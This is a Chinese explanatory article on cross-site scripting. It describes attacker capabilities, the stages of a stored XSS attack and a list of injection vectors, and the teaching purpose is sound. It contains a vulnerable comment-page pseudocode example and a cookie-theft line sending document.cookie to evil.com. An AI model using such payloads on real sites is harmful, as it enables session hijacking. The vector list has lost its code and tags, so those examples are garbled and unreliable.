跨站脚本攻击(XSS)是一种客户端代码注入攻击。攻击者通过在合法的网页中注入恶意代码，达到在受害者的浏览器中执行恶意代码的目的。当受害者访问执行恶意代码的网页时，攻击就开始了。这些网页成为了将恶意代码发送到用户浏览器的工具。通常受到跨站脚本攻击的网页包括论坛、留言板以及可以评论的网页。

如果网页将用户的原始输入作为网页内容，那么它很容易受到 XSS 攻击，因为这类用户输入一定会被受害者的浏览器解析。XSS 攻击可能存在于 VBScript、ActiveX、Flash，甚至 CSS 中。但它在 JavaScript 中最常见，主要是因为 JavaScript 是大多数浏览体验的基础。

“跨站脚本攻击只影响用户吗？”

如果攻击者能利用某网页上的 XSS 漏洞，在用户浏览器上执行任意的 JavaScript 代码，那么该网站和它的用户都会被影响。像其他安全性问题一样，XSS 不只会给用户造成困扰。如果它影响了你的用户，那么它也会影响你。

跨站脚本攻击也可能用于丑化原网站，而不是攻击网站用户。攻击者通过注入脚本，改变网站的内容，或者甚至将当前页面重定向到另一个网页，例如一个有恶意代码的网页。

攻击者能利用 JavaScript 做什么？

与诸如 SQL 注入这样的漏洞相比，我们一般会认为 XSS 漏洞是低风险的。起初，能在网页端执行 JavaScript 引起的后果可能并不严重。大多数浏览器都是在严格受控的环境中运行 JavaScript，这使得 JavaScript 在访问用户的操作系统和文件上受到限制。但是，如果将 JavaScript 用于恶意内容中，它仍然会带来一定的风险：

网页其余部分能访问的所有对象，恶意的 JavaScript 都能访问。包括访问用户的 cookie。用户的 cookie 通常被用来存储会话标志。如果攻击者获得了用户的会话 cookie，他们便能伪装成该用户，利用其身份执行操作，并且访问用户的敏感数据。

JavaScript 可以读取并任意修改浏览器中的 DOM。还好，该情形只可能发生在 JavaScript 当前运行的网页中。

JavaScript 可使用 XMLHttpRequest 对象，向任意站点发送带有任意数据的 HTTP 请求。

现代浏览器中的 JavaScript 可使用 HTML5 接口。例如可访问用户的地理位置、摄像头、麦克风，甚至是用户文件系统中的指定文件。虽然这些接口大多数都需要经过用户同意，但攻击者可通过社会工程学绕过这些限制。

通过以上几点，并结合社会工程学，不法之徒可发起更高级的攻击，包括：盗窃 Cookie、种植木马、记录密钥、网络钓鱼和盗窃身份。XSS 漏洞提供了完美的空间将攻击升级为更严重的攻击。跨站脚本攻击经常与其他类型的攻击一起被使用，例如：跨站请求伪造(CSRF)。

跨站脚本攻击的类型包括：存储型/持久化的 XSS、 反射型/非持久化的 XSS 和 基于 DOM 的 XSS。你可在 XSS 的类型一文中了解更多内容。

跨站脚本攻击如何工作

典型的 XSS 攻击有两个阶段：

为了在受害者的浏览器中运行恶意 JavaScript 代码，攻击者必须先找到一种方式将恶意代码注入到受害者访问的网页中。

之后，受害者必须访问有恶意代码的网页。如果攻击者有特定的攻击目标，该攻击者可使用社会工程学结合(或)网络钓鱼的方式给受害者发送恶意网址。

要完成第一步，易受攻击的网站需要将用户的输入直接包含在它的页面中。之后攻击者便能插入恶意代码片段，这些代码将在网页中使用并被受害者的浏览器视为源代码。也有一些 XSS 攻击的变体，攻击者利用社会工程学诱导用户访问某网址，并且该网址中就包含了恶意代码。

以下是服务端伪代码片段，用于在网页中展示最近的评论：

print “”

print “

Most recent comment

”

print database.latestComment

print “”

复制代码

以上脚本很简单，作用是从数据库中取出最近的评论并放入 HTML 页面中。这段脚本默认页面展示的评论是纯文本，而不包含 HTML 标签或其他代码。这就导致了页面很容易遭受 XSS 攻击，因为攻击者可以提交包含恶意代码的评论。例如当评论的内容是以下代码：

doSomethingEvil();

复制代码

网站服务端为访问该网页的用户提供以下 HTML 代码：

Most recent comment

doSomethingEvil();

复制代码

当受害者的浏览器加载该页面时，攻击者的恶意脚本开始执行。受害者常常不会意识到这类情形，也不能阻止这类攻击。

使用 XSS 攻击偷取 Cookie

不法之徒经常使用 XSS 攻击偷取 cookie。如此他们便能伪装成受害者。攻击者有多种方式将 cookie 发送到他们自己的服务器。其中一种方式是在受害者浏览器中执行以下客户端代码：

window.location = “http://evil.com/?cookie=” + document.cookie;

复制代码

下图展示了简单 XSS 攻击的各步骤。

攻击者通过在提交表单时携带恶意 JavaScript 内容，将恶意内容注入到网站的数据库中。

受害者向网站服务端请求网页。

网站服务端将攻击者的恶意内容作为 HTML 内容的一部分，并返回给受害者的浏览器。

受害者的浏览器执行包含在 HTML 中的恶意脚本。在该场景中，它将受害者的 cookie 发送到攻击者的服务器。

在 HTTP 请求抵达服务器时，攻击者只需从请求中提取受害者的 cookie 即可。

攻击者可以使用刚刚偷窃的受害者 cookie 进行伪装。

想了解更多如何实现 XSS 攻击，你可以参考一份跨站脚本攻击的综合教程。

跨站脚本攻击方式

以下列表包含常见的 XSS 攻击方式，攻击者可使用它们降低网站的安全性。OWASP 组织维护了一个更完整的 XSS 攻击方式的列表：XSS Filter Evasion Cheat Sheet。

复制代码

JavaScript 事件

像 onload 和 onerror 这类 JavaScript 事件属性能在很多种标签中使用。这也是一类非常流行的 XSS 攻击方式。

复制代码

在

标签中，除了像上面一样，可以通过事件属性实现 XSS 攻击代码外，还可以通过更多鲜为人知的属性，比如：background 属性。

复制代码

标签

一部分浏览器会执行 属性中的 JavaScript 代码。

复制代码

标签

标签的功能是将另一个 HTML 页面嵌入到当前页面中。由于内容安全协议(CSP)，尽管 IFrame 中可能有 JavaScript 代码，但这些代码没有权限访问父页面上的 DOM。然而，IFrame 仍然是发起网络钓鱼攻击的有效方式。

复制代码

标签

在一些浏览器中，如果 标签的 type 属性被设置成 image，那么它便能嵌入脚本。

复制代码

标签

标签通常用于链接外部样式表，但也可以包含脚本。

复制代码

复制代码